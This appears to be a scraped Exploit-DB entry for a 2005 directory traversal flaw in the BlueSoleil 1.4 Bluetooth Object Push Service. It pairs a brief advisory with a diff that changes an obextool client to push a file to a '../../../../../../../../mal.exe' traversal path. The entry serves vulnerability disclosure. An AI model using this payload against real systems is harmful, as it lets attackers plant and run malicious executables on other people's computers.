Lucene search

K
exploitdbKevin FinisterreEDB-ID:25325
HistoryApr 01, 2005 - 12:00 a.m.

BlueSoleil 1.4 - Object Push Service BlueTooth Arbitrary File Upload / Directory Traversal

2005-04-0100:00:00
Kevin Finisterre
www.exploit-db.com
12

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/12961/info

BlueSoleil is prone to directory traversal attacks during Bluetooth file uploads. The issue exists in the Object Push Service.

This vulnerability may allow an attacker to upload malicious files to arbitrary locations on affected computers over Bluetooth. An attacker can take advantage of the issue to execute arbitrary code by uploading executables to a location on the computer where they will later be executed. 

@@ -316,7 +316,7 @@
}

filename = argv[1];
- alias = basename(filename);
+ alias = "../../../../../../../../mal.exe";
str2ba(argv[2], &bdaddr);
channel = (argc > 3) ? atoi(argv[3]) : 10;

The modified obextool client may then be used to push a malicious file to a target computer. 

AI Score

7.4

Confidence

Low

Related for EDB-ID:25325